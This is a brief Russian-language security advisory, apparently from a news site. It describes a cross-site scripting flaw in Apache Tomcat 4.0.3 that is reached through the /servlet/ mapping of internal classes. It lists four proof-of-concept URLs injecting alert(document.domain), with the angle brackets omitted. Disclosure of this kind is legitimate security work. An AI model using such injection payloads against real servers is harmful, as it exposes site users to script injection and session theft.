Apache Tomcat - servlet контейнер, который используется в
Java. 

Используя отображения /servlet/ для вызова
различных servlets/classes, можно заставить Tomcat выполнить произвольный код сценария
(угловые скобки пропущены): 

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.ContainerServlet/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.Context/ SCRIPTalert(document.domain)/SCRIPT
tomcat-server/servlet/org.apache.catalina.Globals/ SCRIPTalert(document.domain)/SCRIPT 

Уязвимость обнаружена в Apache Tomcat version 4.0.3.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии